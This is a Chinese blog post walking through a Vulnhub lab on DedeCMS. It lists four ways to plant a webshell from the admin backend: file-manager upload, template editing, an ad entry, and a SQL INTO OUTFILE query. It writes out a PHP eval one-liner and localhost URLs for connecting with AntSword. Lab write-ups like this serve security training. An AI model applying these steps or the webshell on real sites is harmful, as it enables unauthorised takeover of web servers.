当前位置: 首页 > news >正文

Vulnhub-dedecms织梦通关攻略

news 来源:原创 2025/5/8 12:56:22

        姿势一、通过文件管理器上传WebShell

        第一步:进入后台,找到文件管理器上传木马文件

        第二步:使用蚁剑进行连接

#文件地址
http://localhost/dedecms/shell.php

        

        姿势二、修改模板⽂件拿WebShell

        第一步:修改模板文件,删除主页index.htm中原有内容,写入一句话木马

        第二步:更新主页html为index.php

        第三步:使用蚁剑进行连接

http://localhost/dedecms/dede/../index.php

        姿势三、后台任意命令执⾏拿WebShell

        第一步:增加一条广告,内容为一句话木马

        第二步:点击【代码】,将图中显示的路径与站点进⾏拼接....访问测试

        第三步:使用蚁剑进行连接

http://localhost/dedecms/plus/ad_js.php?aid=1

        姿势四、通过后台sql命令执⾏拿webshell

        第一步:找到系统--sql命令⾏⼯具,执⾏select @@ basedir,得到mysql的路径,由此猜测⽹站绝对路径

        第二步:into outfile写⼊⼀句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'
        第三步:使用蚁剑进行连接

                                                                                                                               FROM  IYU_

相关文章:

  • TiDB × AI :DeepSeek 时代你需要什么样的数据基座
  • HTML 表单处理进阶:验证与提交机制的学习心得与进度(二)
  • 前端-选中pdf中的文字并使用,显示一个悬浮的翻译按钮(本地pdfjs+iframe)不适用textlayer
  • 嵌入式面经(2)——央企篇
  • 医学图像白血病分割数据集labelme格式245张5类别
  • ES聚合学习(三)
  • git上传文件到远程库
  • 解决 uniapp 开发中权限申请同步告知目的问题| 华为应用商店上架审核问题解决
  • 安装和管理最新的Python3环境(以Mac为例)
  • Docker 数据卷管理
  • Spring 如何管理 Bean 的生命周期?
  • 11--华为防火墙Easy-IP实现原理与配置全解:从“翻译官“到“流量导演“的奇幻之旅(包你看一遍全记住)
  • Django REST Framework 请求封装源码解析与实现流程
  • 1、环境初始化--Linux安装dockerCE
  • Java 集合框架:从数据结构到性能优化,全面解析集合类
  • JavaScript基础-API 和 Web API
  • HIVE安装(详细教程)
  • Python实战(4)-网络编程
  • Liunx系统Microsoft SQL Server数据库还原
  • datawhale组队学习-大语言模型-task5:主流模型架构及新型架构
  • 股价两天涨超30%,中航成飞:不存在应披露而未披露的重大事项
  • 国家主席习近平同普京总统举行大范围会谈
  • 绍兴柯桥:用一块布托起中国制造的新经纬
  • 首批18位!苏联籍抗日航空英烈信息更新
  • 圆桌丨权威专家解读中俄关系:在新形势下共同应对挑战、共创发展机遇
  • 金融监管总局:做好2025年小微企业金融服务工作